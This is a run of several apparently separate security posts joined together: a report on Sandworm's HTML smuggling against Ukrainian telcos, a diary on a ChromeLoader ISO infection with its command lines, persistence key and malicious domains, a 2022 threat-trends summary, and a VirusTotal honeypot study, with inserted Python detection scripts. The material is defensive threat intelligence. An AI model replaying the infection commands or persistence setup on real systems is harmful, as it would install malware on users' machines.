In April, Sandworm targeted energy facilities in Ukraine with a new strain of the Industroyer ICS malware (INDUSTROYER2) and a new version of the CaddyWiper wiper.

The APT hacking group is believed to have been behind numerous attacks this year, including an attack on Ukrainian energy infrastructure and the deployment of a persistent botnet called “Cyclops Blink” dismantled by the US government in April.

From August 2022, Recorded Future researchers observed a rise in command and control (C2) infrastructure used by Sandworm (tracked by Ukraine’s CERT-UA as UAC-0113).

The researchers observed C2 infrastructure relying on dynamic DNS domains masquerading as Ukrainian telecommunication service providers.

State-sponsored hackers used their infrastructure to deliver multiple malicious payloads via an HTML smuggling technique, including Colibri Loader and Warzone RAT.

“A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113’s broadening but continuing use of publicly available commodity malware.” reads the report published by Recorded Future.

While analyzing the C2 infrastructure Recorded Future discovered that the domain datagroup[.]ddns[.]net reported in CERT-UA’s June report on UAC-0113 was likely masquerading as the Ukrainian telecommunications company Datagroup. The domain resolved to the IP address 31[.]7[.]58[.]82, which was used to host the domain kyiv-star[.]ddns[.]net impersonating another Ukrainian telecommunications company Kyivstar.

Between July and August, the researchers noticed the use of the “ett[.]ddns[.]net” and “ett[.]hopto[.]org” domains likely used to impersonate the LLC Ukrainian telecom operator EuroTransTelecom.

The attack chain starts with spear-phishing messages, pretending to come from a Ukrainian telecommunication provider, sent to the victims in an attempt to trick them into visiting the malicious domains.

The messages are written in Ukrainian and the topics used in the attacks relate to military operations, reports, etc.

Experts noticed the presence of the same web page on multiple domains; it displays the text “ОДЕСЬКА ОБЛАСНА ВІЙСЬКОВА АДМІНІСТРАЦІЯ”, which translates as “Odesa Regional Military Administration”, along with “File is downloaded automatically” in English.

The HTML of the webpage contains a base64-encoded ISO file that is automatically downloaded when the website is visited. The threat actors used the HTML smuggling technique. HTML smuggling is a highly evasive technique for malware delivery that leverages legitimate HTML5 and JavaScript features. The malicious payloads are delivered via encoded strings in an HTML attachment or webpage. The malicious HTML code is generated within the browser on the target device which is already inside the security perimeter of the victim’s network.  
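As an added example, not code from the article or from Recorded Future, the Python below inspects an HTML page for the artifact this paragraph describes: a long base64 literal that decodes to a file container. It checks decoded blobs against the ISO 9660 volume-descriptor identifier CD001 at offset 0x8001 and a few other magic values. The page it scans is constructed and carries only an ISO stub, no download logic.

```python
"""Find base64-encoded file payloads embedded in an HTML page.

Added example, not code from the article or from Recorded Future. The page
built below is constructed: a long base64 literal that decodes to an ISO 9660
image stub. Real smuggling pages decode such a blob with JavaScript and trigger
a download; this script only inspects the HTML text.
"""
import base64
import binascii
import re
from typing import Optional

# Runs of base64 text long enough to carry a file; short data: URIs for icons are ignored.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{256,}={0,2}")

# (name, offset, magic). ISO 9660 keeps its primary volume descriptor at sector 16:
# one type byte at 0x8000, then the ASCII identifier "CD001" at 0x8001.
SIGNATURES = [
    ("iso9660", 0x8001, b"CD001"),
    ("pe", 0, b"MZ"),
    ("zip", 0, b"PK\x03\x04"),
    ("gzip", 0, b"\x1f\x8b"),
]


def identify(blob: bytes) -> Optional[str]:
    """Return the container type whose magic matches, or None."""
    for name, offset, magic in SIGNATURES:
        if blob[offset:offset + len(magic)] == magic:
            return name
    return None


def find_smuggled_payloads(html: str) -> list:
    """Decode every long base64 run and report those that look like a file container."""
    findings = []
    for match in B64_RUN.finditer(html):
        text = match.group(0)
        try:
            blob = base64.b64decode(text, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 (e.g. a long alphanumeric token in minified JS)
        kind = identify(blob)
        if kind:
            findings.append({"type": kind, "size": len(blob), "html_offset": match.start()})
    return findings


def build_sample_page() -> str:
    """Constructed HTML resembling the lure the article describes, carrying a
    minimal ISO stub (zeros up to the volume descriptor, then the identifier)
    and a tiny inline icon that stays below the detection threshold."""
    iso_stub = b"\x00" * 0x8000 + b"\x01CD001"
    payload = base64.b64encode(iso_stub).decode("ascii")
    tiny_icon = base64.b64encode(b"GIF89a" + b"\x00" * 10).decode("ascii")
    return (
        "<html><body><h1>File is downloaded automatically</h1>"
        f'<img src="data:image/gif;base64,{tiny_icon}">'
        f'<script>var file = "{payload}";</script>'
        "</body></html>"
    )


if __name__ == "__main__":
    for finding in find_smuggled_payloads(build_sample_page()):
        print(finding)
```

A mail gateway or proxy can apply the same check to HTML attachments and fetched pages; the decoded blob is then handed to a sandbox or hashed against threat intelligence, which is where the article's indicators come in.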

The researchers published a report that includes details about the malware and the C2 infrastructure.

The WarZone RAT malware may be old, but it still offers powerful features like a UAC bypass, hidden remote desktop, cookie and password stealing, live keylogger, file operations, reverse proxy, remote shell (CMD), and process management.

Pierluigi Paganini

The post Russian Sandworm APT impersonates Ukrainian telcos to deliver malware appeared first on Security Affairs.

In the last few weeks, I’ve seen a significant uptick in systems infected with Chromeloader malware. This malware is a malicious extension for your browser, redirecting it to ad sites and hijacking searches. But with the success of this technique recently, I would not be surprised if others will take notice and switch to using it for other things. 

Initial infection 

The user went to the malicious search results, where the query they searched for presented an ISO file for their search terms. Below are the results for a user that got infected.

https://alizebruisiacult[.]xyz/?cms=Mzg1ODEEDwwMCAYNDQwCAQsCDNDEDgcCDwwPAQAASQ%3D%3D&fn=Stroud%20-%20Advanced%20Engineering%20Mathematics%204e&extt=xpectthatmy.shop%2F%3Ftid%3D952736

C:\Users\user\Downloads\Stroud – Advanced Engineering Mathematics 4e.iso

This ISO file contained the following files:
files.zip
res.ico
Install.lnk
properties.bat

The user double-clicked the properties.bat file, which started the infection process.

Parent Process Name: cmd.exe
Parent Process Command Line: cmd.exe /c ""D:\properties.bat" "
Process Name: tar.exe
Process Command Line arguments: tar -xvf "files.zip" -C "C:\Users\user\AppData\Roaming"

They established persistence with a CurrentVersion\Run key:

"opensubtitles-uploader.exe "k2eN"" /f

HKEY_CURRENT_USER\S-1-5-21-740110469-27406-3214746-20027\SOFTWARE\Microsoft\Windows\CurrentVersion

C:\Users\user\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe

Connections to some malicious domains were made from opensubtitles-uploader.exe:

C:\Users\user\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe

https://alizebruisiacult[.]xyz

https://raw.githubusercontent[.]com

Since the infection is coming from a user mounting and executing files in an ISO, the best way to stop this is to prevent a user from mounting the ISO by double-clicking. Users are still able to burn a CD from within Windows if needed. If you have power users that need to open ISOs, they can use compression utilities.

Mubix (Rob Fuller) has a great article about how to disable this (1). Below are two different options to prevent users from double-clicking ISO files to mount them. The GPO method is a little more complete in its protections; see the article for more details. We have deployed this in my environment to end users’ desktops and have not had any issues to this point, nor any new infections via this method.

GPO

Computer config -> Admin Templates -> System -> Device Installation Restrictions ->

Allow administrators to override Device Installation Restrictions Policies (enabled)
Prevent Installation from devices that match any of these device IDs

Add this exact ID:

SCSI\CdRomMsft____Virtual_DVD-ROM_

Registry Setting

HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount
Value "ProgrammaticAccessOnly" as REG_SZ

(1) https://malicious.link/post/2022/blocking-iso-mounting/ 

If you have done this or something similar, let us know. 

Tom Webb

@twsecblog

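As an added example that is not part of the diary, the Python below turns the process and registry telemetry quoted above into two detection rules: tar.exe launched by cmd.exe from a script at the root of a non-system drive (the letter a mounted ISO receives) that extracts into AppData\Roaming, and a Run-key value that points into AppData\Roaming. The event field names (image, cmdline, parent_image, parent_cmdline, reg_key, reg_data) are assumed and would be mapped to your EDR's schema; the sample events are constructed from the diary's command lines plus benign look-alikes that must not fire.

```python
"""Detect the ChromeLoader-style ISO infection chain in process and registry telemetry.

Added example, not part of the diary. Field names are assumed; map them to your
EDR's schema. Sample events are constructed from the command lines quoted in the
diary, plus benign look-alikes to show what does not fire.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str                   # "process" or "registry"
    image: str = ""
    cmdline: str = ""
    parent_image: str = ""
    parent_cmdline: str = ""
    reg_key: str = ""
    reg_data: str = ""


# A mounted ISO gets its own drive letter; a script at the root of a non-system
# drive is the first visible step in the diary's chain.
ROOT_SCRIPT_ON_OTHER_DRIVE = re.compile(
    r'\b[D-Z]:\\[^\\"]+\.(?:bat|cmd|lnk|vbs|js)\b', re.IGNORECASE)
APPDATA_ROAMING = re.compile(r'\\AppData\\Roaming\b', re.IGNORECASE)
RUN_KEY = re.compile(r'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b', re.IGNORECASE)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def rule_iso_script_tar_to_appdata(ev: Event):
    """cmd.exe running a script from a non-system drive root spawns tar.exe that
    unpacks an archive into the user's roaming profile (the files.zip step)."""
    if ev.kind != "process" or _basename(ev.image) != "tar.exe":
        return None
    if (_basename(ev.parent_image) == "cmd.exe"
            and ROOT_SCRIPT_ON_OTHER_DRIVE.search(ev.parent_cmdline)
            and APPDATA_ROAMING.search(ev.cmdline)):
        return ("ISO_SCRIPT_TAR_TO_APPDATA", ev.cmdline)
    return None


def rule_run_key_appdata(ev: Event):
    """Run-key persistence whose value points at an executable under AppData\\Roaming."""
    if ev.kind == "registry" and RUN_KEY.search(ev.reg_key) and APPDATA_ROAMING.search(ev.reg_data):
        return ("RUN_KEY_APPDATA_PERSISTENCE", ev.reg_data)
    return None


RULES = (rule_iso_script_tar_to_appdata, rule_run_key_appdata)


def detect(events) -> list:
    """Apply every rule to every event; return (rule_id, evidence) tuples in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts


def sample_events() -> list:
    """Constructed telemetry: two events from the diary, two benign look-alikes."""
    run_key = (r"HKEY_CURRENT_USER\S-1-5-21-740110469-27406-3214746-20027"
               r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    return [
        # From the diary: properties.bat on the mounted ISO (D:) extracts files.zip into Roaming.
        Event("process", image=r"C:\Windows\System32\tar.exe",
              cmdline=r'tar -xvf "files.zip" -C "C:\Users\user\AppData\Roaming"',
              parent_image=r"C:\Windows\System32\cmd.exe",
              parent_cmdline=r'cmd.exe /c ""D:\properties.bat" "'),
        # Constructed benign: an admin unpacking logs from PowerShell into C:\Temp.
        Event("process", image=r"C:\Windows\System32\tar.exe",
              cmdline=r'tar -xvf "C:\Users\admin\Downloads\logs.tar" -C "C:\Temp"',
              parent_image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              parent_cmdline="powershell.exe"),
        # From the diary: Run-key value pointing into the roaming profile.
        Event("registry", reg_key=run_key,
              reg_data=r'"C:\Users\user\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe" "k2eN"'),
        # Constructed benign: a vendor updater installed under Program Files.
        Event("registry", reg_key=run_key, reg_data=r'"C:\Program Files\Vendor\updater.exe" /background'),
    ]


if __name__ == "__main__":
    for rule_id, evidence in detect(sample_events()):
        print(f"{rule_id}: {evidence}")
```

The first rule deliberately requires all three conditions together (script on a non-system drive, cmd.exe parent, extraction into Roaming) so that a USB stick or a legitimate tar invocation alone does not alert; the second rule is a standing persistence check that remains useful after the ISO-mount mitigations above are deployed.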
In our companion blog post, Vedere Labs analyzed the main ransomware trends we observed in the first half of 2022, including state-sponsored ransomware, new mainstream targets and evolving extortion techniques. Ransomware is the main threat targeting most organizations nowadays. However, three other notable cyberthreat trends also evolved during this period:

Threat actors – We saw an almost equal split between cybercriminals and state-sponsored actor activity, with the vast majority of malicious activity perpetrated by Russian or Eastern European actors. The main targeted sectors were government and financial services.
New malware – Significant malware families such as wipers, OT/ICS malware and botnets targeted not only IT systems but also many types of IoT devices.
Active hacking groups – Because of the ongoing conflict in Ukraine, hundreds of hacktivists perpetrated DDoS and other types of attacks. Alongside the politically motivated activity, other large groups focusing on data exfiltration for financial gains have been active.

Below we analyze each of these trends in more detail. This is not an exhaustive discussion of the current threat landscape, but rather a series of observations about the most relevant activity we have seen. As in the related ransomware post, at the end we discuss how you can bolster your current defensive strategies to account for these developments.

Cybercriminals and state-sponsored threat actors

The figures in this section are based on data from the Forescout Device Cloud, one of the world’s largest repositories of connected enterprise device data — including IT, OT and IoT device data — whose number of devices grows daily. The anonymous data comes from Forescout customer deployments and contains information about almost 19 million devices. More specifically, we look at requests to known malicious domains originating from our customer networks between January 1 and April 20, then match them to known advanced persistent threats (APTs).

Figure 1 – Malicious requests by threat actor country of origin

Figure 1 shows the percentage of malicious requests based on the threat actor’s country of origin. Russia and Eastern Europe host an overwhelming majority (83%) of the threat actors we observed, followed by China (9%) and Pakistan (5%).

We have observed in total 19 threat actors active on monitored networks in the first half of 2022. Known state-sponsored actors accounted for 53% of the activity we observed, and the remaining 47% was due to cybercriminal groups.

The top observed actors were APT29/Cozy Bear, IcedID/Lunar Spider, Evil Corp/Indrik Spider, FIN7/Carbon Spider and Temper Panda. The first four are based in Russia while the last is based in China. The first and last are state-sponsored actors, while the three in the middle are cybercriminals.

The observed actors targeted many different sectors, as shown in Figure 2. Government networks were targeted most often (41%), followed by financial services (28%). Both sectors have long been preferred targets for cyber activities.

Figure 2 – Malicious requests by targeted sector

New malware – wipers, OT/ICS malware and botnets

Vedere Labs observes thousands of new exploit and malware samples every day, either from public sources or from attacks on our Adversary Engagement Environment, a set of publicly accessible honeypots. Most of these artifacts are variations of known malicious tools, including WannaCry samples – which are still very much active even five years after the initial infections – and exploit attempts on Log4j vulnerabilities – which have recently been declared endemic by a new DHS Cyber Safety Review Board.

The most interesting malware developments typically garner attention because of new malicious capabilities, who is deploying the malware or whom it is targeting – and often because of a combination of the three aspects. Beyond several previously covered ransomware families, the first half of 2022 saw many new relevant malware instances.

Destructive wipers

Several wipers were used for sabotage or to destroy evidence as part of the ongoing conflict in Ukraine. This type of malware typically overwrites or encrypts either files or the master boot record (MBR)/master file table (MFT) of a system. Since their impact is similar to ransomware, often attackers disguise the malware as ransomware by adding fake ransom notes to mislead incident responders or to hide their motivations. The most interesting wiper detected so far this year was AcidRain, which was used against VIASAT KA-SAT modems on February 24, rendering more than 5,000 wind turbines in Germany unable to communicate.

OT/ICS-specific malware

OT/ICS malware continues to abuse insecure-by-design native capabilities of OT equipment. Industroyer2 and INCONTROLLER, two new samples of OT/ICS-specific malware, were disclosed to the public almost simultaneously in mid-April. Industroyer2 leverages OS-specific wipers and a dedicated module to communicate over the IEC-104 protocol for electrical substations, while the INCONTROLLER toolkit contains modules to read/write from/to ICS devices using industrial network protocols, such as OPC UA, Modbus, CODESYS and Omron FINS.

Persistent and emerging botnets

Many botnets either appeared, reappeared or became known for the first time in 2022. Emotet, one of the largest botnets ever until its shutdown in 2021, returned with hundreds of thousands of new infections and was distributed in new campaigns using malicious emails. The Cyclops Blink botnet, developed by the Sandworm APT as a possible successor to VPNFilter, had been active since 2019 but was discovered at the beginning of this year and taken down soon after discovery. Keksec, a criminal group known for operating several botnets, such as Gafgyt and Simps, developed and open-sourced a new botnet called EnemyBot, reusing code from Mirai and other botnets with several exploits for IoT devices as well as enterprise IT applications.

Remote Access Trojan (RAT)

ZuoRAT is a recent Remote Access Trojan (RAT) that leverages exposed and vulnerable routers for initial infection, enumerates IT devices connected to the network, then uses DNS and HTTP hijacking to install other malware on the identified devices. Disturbingly, this malware can automatically jump from IoT to IT assets. Researchers have speculated that it is operated by a state-sponsored group because of its complexity.

Hacking groups

Two types of hacking groups were active in the first half of 2022: hacktivists and data extortion groups. Hacktivists are mainly politically motivated, especially because of the war in Ukraine. Data extortion groups are very similar to ransomware gangs in that they focus on exfiltrating data and demanding a ransom to not release it publicly. However, they employ different malware and do not operate a ransomware-as-a-service model.

Hacktivists

More than 100 groups have conducted cyberattacks since the beginning of the Russian invasion of Ukraine. The attacks were mostly DDoS, but also included data breaches, the use of wipers and distribution of propaganda. Some groups claimed attacks on critical infrastructure, such as disabling electric vehicle chargers in Moscow and railways in Belarus.

Most of these groups are located in Russia or Ukraine but others are in Belarus, Turkey, Romania, Poland, Portugal and Italy. They usually communicate and coordinate their actions via Twitter or Telegram. Killnet became the most notorious group, using simple DDoS tools to take down websites of critical infrastructure companies in the U.S. and Europe such as airports, banks and government agencies. They also spread propaganda to more than 100,000 members of their Telegram channel.

Data extortion groups

LAPSUS$ is a hacking group that has been active since 2021 and has breached several high-profile organizations, starting with major Brazilian governmental agencies and companies. In 2022 it moved on to global businesses such as Microsoft, Nvidia and Okta. Following a series of arrests in the UK in March, the group has been mostly silent. Of particular interest were the intensive use of stolen credentials and cooperating insiders for their hacks, as well as their strong social media presence. Other groups focusing on data extortion include RansomHouse and Karakurt. The latter is connected to the Conti ransomware gang.

Mitigation recommendations

The proliferation of IoT devices continues to expand the digital terrains of organizations, without commensurate attention to securing them. Both cybercriminals and state-sponsored actors are well aware of this. Therefore, we recommend that mitigation strategies prioritize securing the increased attack surface based on up-to-date threat intelligence.

The mitigations suggested for ransomware also apply to the threats analyzed here. Additional recommendations include:

Segment the network to isolate IT and OT, limiting network connections to only specifically allowed management and engineering workstations – thus decreasing the probability of OT/ICS malware reaching its target. Use an OT-aware DPI-capable monitoring solution to alert on malicious indicators and behaviors, watching internal systems and communications for known hostile actions.
Monitor insider threats, large data transfers and activity in dark nets to prevent or mitigate data leakage by hacktivists and data extortion groups. Monitor especially known data leaks for exposed credentials.
Use strong and unique passwords and employ multifactor authentication whenever possible to ensure that stolen credentials cannot easily be used against your organization.
Follow the NCSC-UK’s guide on Denial of Service attacks, which includes understanding weak points in your service, ensuring that service providers can handle resource exhaustion, scaling the service to handle concurrent sessions, preparing a response plan and stress testing systems regularly.
Identify and patch vulnerable IoT devices to prevent them from being used as part of DDoS botnets. Also change defaults or easily guessable passwords on these IoT devices.
Monitor the traffic of IoT devices to identify those being used as part of distributed attacks.

Besides relying on protection of assets and identification of attacks via intrusion detection, hunt for threats in your network using specific IoCs and known TTPs, such as the use of valid credentials from unknown endpoints followed by large data transfers for hacking groups.

Threat hunting and incident response

Forescout Frontline is a threat hunting, risk identification and incident response service for organizations that lack the internal resources and visibility to defend themselves from or respond to cybersecurity attacks. Forescout Frontline works in close collaboration with Vedere Labs, leveraging the intelligence we provide to identify ongoing attacks in real organizations.

The post Cyberthreat Trends in 2022H1: Threat Actors Observed, New Malware and Active Hacking Groups appeared first on Forescout.

Spyware, ransomware and cryptojacking malware have been increasingly detected on industrial control system (ICS) computers, according to data collected in the first half of 2022 by cybersecurity firm Kaspersky.

[This post was submitted by Jesse La Grew]

VirusTotal has become an important tool for researchers and defenders alike. Unusual executables or files can be uploaded to get an idea of how different antivirus vendors will classify it. Keeping the discovery of customized malware secret is also important and, in those cases, file hashes can be used to find any preexisting results. It should always be assumed that any file submitted to VirusTotal is being looked at by someone. The malware seen by public honeypots, such as the DShield honeypot, generally are not considered sensitive. Malware seen by these devices is being broadly used around the world in an attempt to compromise IoT (Internet of Things) devices. 
Examples below are from a honeypot that is configured to submit samples to VirusTotal when a new file is downloaded from or uploaded to the honeypot [3]. This helps to summarize attacks and attempt to classify the type of malware being used. A common finding is that there are very different naming conventions and results from vendor to vendor.
Figure 1: VirusTotal results for a file created on honeypot

Vendors With No Results

A surprising item was just how many vendors never gave any results for files seen on this honeypot. 

Acronis
Alibaba
APEX
BitDefenderFalx
Bkav
CMC
CrowdStrike
Cybereason
Cylance
eGambit
Endgame
F-Prot
Invincea
Kingsoft
Malwarebytes
Paloalto
Qihoo-360
SUPERAntiSpyware
SymantecMobileInsight
TACHYON
tehtris
TotalDefense
trapmine
Trustlook
VBA32
Webroot
Zoner

A possibility is that many of these vendors are not supplying data at this time or may not have been used in VirusTotal results in the past. These vendor lists do change over time:
•    73 Providers from date range 6/7/2022 – 7/31/2022
•    82 Providers from date range 6/7/2022 – 9/3/2022
That means in the last month, there has been an increase of 9 vendors, although this doesn’t consider any vendors that may have also been removed at this time.

Suggested Threat Results

VirusTotal also gives general threat classifications that provide a good high-level picture.

VT Threat Classification | Count | Percentage
trojan.shell/malkey | 5579 | 52.43%
trojan.shell/linux | 3816 | 35.86%
downloader.bash/miraia | 299 | 2.81%
downloader.shell | 277 | 2.60%
trojan.linux/mirai | 119 | 1.12%
downloader. | 118 | 1.11%
trojan.mirai/linux | 92 | 0.86%
downloader.bash/linux | 54 | 0.51%
trojan.linux/shell | 53 | 0.50%
downloader.miraia/bash | 31 | 0.29%

Out of over 10,000 different honeypot results, files associated with malicious SSH authorized_keys were the most prevalent. Another item high on the list is Mirai, which is a popular botnet [4]. Many Mirai variants are seen on a regular basis by honeypots.

Results Change Over Time

We have already seen that results can differ between vendors; those vendors change, and even VirusTotal threat classifications can sometimes seem inconsistent. Malware changes and new variants appear. Knowledge about this malware also changes, and this in turn changes the information returned by a variety of tools. Looking at one example, within a 6-hour period the number of vendors flagging a particular hash as malware increased by 13, and the threat classification from VirusTotal also changed from “trojan.mirai/linux” to “trojan.linux/mirai”.

Normalizing the stored hashes with the latest stored VirusTotal threat classification gives a different picture than seen before.

Mirai is still a significant contender for popularity, but the creation of an authorized_keys file is by far the most common. A little help came from Excel and the XLOOKUP function to gather the latest locally stored result for a particular hash [5].
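The normalization step described above, as an added example in Python (not code from the diary; the events, lookups and hashes are constructed placeholders): keep the latest stored lookup per hash, recount the honeypot events with that label, and report how each hash's classification and vendor count drifted between lookups.

```python
from collections import Counter
from datetime import datetime

# Constructed sample data (not from the diary): honeypot file events with the
# VirusTotal suggested threat recorded when each file was submitted, and the
# lookups stored for each hash over time. Hashes are placeholders.
EVENTS = [  # (time seen on the honeypot, sha256, VT suggested threat at that time)
    ("2022-09-01 07:00:00", "hash-a", "trojan.mirai/linux"),
    ("2022-09-01 09:30:00", "hash-a", "trojan.mirai/linux"),
    ("2022-09-01 15:00:00", "hash-a", "trojan.linux/mirai"),
    ("2022-08-30 10:00:00", "hash-b", "trojan.shell/malkey"),
    ("2022-08-31 11:00:00", "hash-b", "trojan.shell/malkey"),
    ("2022-08-29 12:00:00", "hash-c", "downloader.bash/miraia"),
]
# hash-a mirrors the case described above: within six hours the suggested
# threat flipped from trojan.mirai/linux to trojan.linux/mirai and 13 more
# vendors flagged the file.
LOOKUPS = [  # (lookup time, sha256, VT suggested threat, vendors flagging it)
    ("2022-09-01 08:00:00", "hash-a", "trojan.mirai/linux", 28),
    ("2022-09-01 14:00:00", "hash-a", "trojan.linux/mirai", 41),
    ("2022-08-30 10:05:00", "hash-b", "trojan.shell/malkey", 30),
    ("2022-08-31 11:05:00", "hash-b", "trojan.shell/malkey", 33),
    ("2022-08-29 12:05:00", "hash-c", "downloader.bash/miraia", 20),
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def latest_lookup(lookups):
    """Newest stored lookup per hash, i.e. the XLOOKUP 'latest by date' step in code."""
    latest = {}
    for row in lookups:
        when, sha = row[0], row[1]
        if sha not in latest or _ts(when) > _ts(latest[sha][0]):
            latest[sha] = row
    return latest


def raw_counts(events):
    """Count classifications exactly as they were recorded at submission time."""
    return Counter(threat for _, _, threat in events)


def normalized_counts(events, lookups):
    """Count classifications after replacing each event's label with the hash's latest one."""
    latest = latest_lookup(lookups)
    counts = Counter()
    for _, sha, threat in events:
        # Fall back to the recorded label for hashes that never got a stored lookup
        counts[latest[sha][2] if sha in latest else threat] += 1
    return counts


def classification_drift(lookups):
    """Per hash: first and latest suggested threat, vendor-count change, hours between them."""
    first, latest = {}, latest_lookup(lookups)
    for row in lookups:
        when, sha = row[0], row[1]
        if sha not in first or _ts(when) < _ts(first[sha][0]):
            first[sha] = row
    drift = {}
    for sha, last in latest.items():
        start = first[sha]
        drift[sha] = {
            "from": start[2],
            "to": last[2],
            "vendor_delta": last[3] - start[3],
            "hours": (_ts(last[0]) - _ts(start[0])).total_seconds() / 3600,
        }
    return drift


if __name__ == "__main__":
    print("raw:       ", dict(raw_counts(EVENTS)))
    print("normalized:", dict(normalized_counts(EVENTS, LOOKUPS)))
    for sha, d in classification_drift(LOOKUPS).items():
        if d["from"] != d["to"] or d["vendor_delta"]:
            print(sha, d)
```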

Different Provider Comparisons

So far, this has only focused on the suggested classifications from VirusTotal. The naming of these threats by the various vendors also differs quite a bit, and the number of results per vendor varies considerably.

Provider | Number of Results | No Classification | Provider Data Not Available | Total
Avast | 1273 | 519 | 0 | 1792
AVG | 1273 | 34 | 485 | 1792
GData | 1201 | 591 | 0 | 1792
DrWeb | 1151 | 641 | 0 | 1792
MicroWorld-eScan | 1132 | 660 | 0 | 1792
Ad-Aware | 1130 | 662 | 0 | 1792
BitDefender | 1128 | 664 | 0 | 1792
FireEye | 1117 | 675 | 0 | 1792
Emsisoft | 1079 | 695 | 18 | 1792
ALYac | 1030 | 762 | 0 | 1792
Ikarus | 1021 | 771 | 0 | 1792
AhnLab-V3 | 971 | 821 | 0 | 1792
TrendMicro | 942 | 850 | 0 | 1792
TrendMicro-HouseCall | 941 | 851 | 0 | 1792
CAT-QuickHeal | 915 | 877 | 0 | 1792
Kaspersky | 796 | 996 | 0 | 1792
Comodo | 775 | 1017 | 0 | 1792
Arcabit | 756 | 1036 | 0 | 1792
Lionic | 714 | 1078 | 0 | 1792
Avira | 701 | 1091 | 0 | 1792
VIPRE | 692 | 262 | 838 | 1792
Cynet | 686 | 1077 | 29 | 1792
ESET-NOD32 | 628 | 1164 | 0 | 1792
MAX | 622 | 1170 | 0 | 1792
Tencent | 562 | 1230 | 0 | 1792
Microsoft | 533 | 1257 | 2 | 1792
Fortinet | 524 | 1239 | 29 | 1792
Cyren | 523 | 1269 | 0 | 1792
Rising | 517 | 1275 | 0 | 1792
McAfee-GW-Edition | 501 | 1290 | 1 | 1792
Sophos | 496 | 1284 | 12 | 1792
McAfee | 486 | 1305 | 1 | 1792
Sangfor | 458 | 1158 | 176 | 1792
Symantec | 422 | 1039 | 331 | 1792
NANO-Antivirus | 405 | 1387 | 0 | 1792
ZoneAlarm | 305 | 1478 | 9 | 1792
Google | 188 | 60 | 1544 | 1792
F-Secure | 155 | 1637 | 0 | 1792
Antiy-AVL | 121 | 890 | 781 | 1792
ClamAV | 107 | 1671 | 14 | 1792
SentinelOne | 94 | 1698 | 0 | 1792
Elastic | 74 | 1707 | 11 | 1792
MaxSecure | 72 | 1710 | 10 | 1792
Jiangmin | 71 | 1721 | 0 | 1792
Avast-Mobile | 70 | 1722 | 0 | 1792
BitDefenderTheta | 59 | 1729 | 4 | 1792
Zillya | 56 | 1736 | 0 | 1792
VirIT | 51 | 1726 | 15 | 1792
ViRobot | 48 | 1744 | 0 | 1792
Gridinsoft | 23 | 1758 | 11 | 1792
Yandex | 22 | 1770 | 0 | 1792
Baidu | 7 | 1785 | 0 | 1792
Panda | 5 | 1780 | 7 | 1792
K7AntiVirus | 2 | 1790 | 0 | 1792
K7GW | 2 | 1790 | 0 | 1792
CMC | 0 | 995 | 797 | 1792
TACHYON | 0 | 1792 | 0 | 1792
Malwarebytes | 0 | 1774 | 18 | 1792
Trustlook | 0 | 1792 | 0 | 1792
Zoner | 0 | 1792 | 0 | 1792
BitDefenderFalx | 0 | 1781 | 11 | 1792
TotalDefense | 0 | 11 | 1781 | 1792
eGambit | 0 | 14 | 1778 | 1792
Kingsoft | 0 | 1783 | 9 | 1792
Acronis | 0 | 1792 | 0 | 1792
Invincea | 0 | 11 | 1781 | 1792
CrowdStrike | 0 | 1792 | 0 | 1792
F-Prot | 0 | 11 | 1781 | 1792
VBA32 | 0 | 1792 | 0 | 1792
APEX | 0 | 1792 | 0 | 1792
tehtris | 0 | 1777 | 15 | 1792
SUPERAntiSpyware | 0 | 1792 | 0 | 1792
Webroot | 0 | 1792 | 0 | 1792
SymantecMobileInsight | 0 | 1792 | 0 | 1792
Qihoo-360 | 0 | 11 | 1781 | 1792
Cybereason | 0 | 1671 | 121 | 1792
Endgame | 0 | 11 | 1781 | 1792
Alibaba | 0 | 1792 | 0 | 1792
Bkav | 0 | 1792 | 0 | 1792
Trapmine | 0 | 1746 | 46 | 1792
Paloalto | 0 | 1792 | 0 | 1792
Cylance | 0 | 1787 | 5 | 1792

The end of this list also shows the vendors that returned no results at all. Looking at some of the most popular providers, we also see differences in how threats are named.

Avast Result | Count | VirusTotal Suggested Threats
Other:Malware-gen [Trj] | 517 | trojan.shell/linux, trojan.shell/malkey, trojan.linux/bruteforce, trojan.linux/shell, trojan.linux/bash, trojan.linux/sshbru, trojan.linux
BV:Downloader-AAN [Drp] | 185 | downloader.linux, trojan.linux/shell, downloader.bash/linux, downloader.bash/miraia, downloader.linux/bash, downloader.linux/shell
BV:Downloader-AEH [Drp] | 146 | downloader.miraia/bash, trojan.linux/mirai, downloader.linux, downloader.gen2, downloader.bash/linux, downloader., downloader.shell, downloader.bash/miraia
BV:Agent-BAP [Trj] | 97 | trojan.shell/linux, trojan.linux/shell, trojan.ircbot/shell, trojan.ircbot/linux, trojan.linux/ircbot, trojan.shell/ircbot
BV:Downloader-II [Trj] | 93 | trojan.shell/vsntcg22, downloader., downloader.jvhi/shell, downloader.shell, downloader.shell/linux
BV:Downloader-OJ [Drp] | 78 | trojan.shell, downloader.shell, trojan.shell/gen2
ELF:Mirai-BOD [Trj] | 25 | trojan.mirai/linux, trojan.linux/mirai
ELF:Xorddos-AB [Trj] | 23 | trojan.linux/xorddos
BV:Downloader-APV [Drp] | 19 | downloader.bash/miraib, downloader.miraib/bash
ELF:Miner-KC [Trj] | 19 | trojan.linux, trojan.linux/uselvhs22, trojan.linux/multiverze, trojan.linux/tygpz
BV:Downloader-APK [Drp] | 17 | downloader.bash/miraib, trojan.linux/shell, downloader.shell/bashdlod, downloader.miraib/bash
ELF:BitCoinMiner-HF [Trj] | 9 | miner.linux/camelot
ELF:Mirai-ADP [Trj] | 9 | trojan.mirai/linux, trojan.linux/mirai
ELF:Mirai-AHC [Trj] | 5 | trojan.linux/mirai
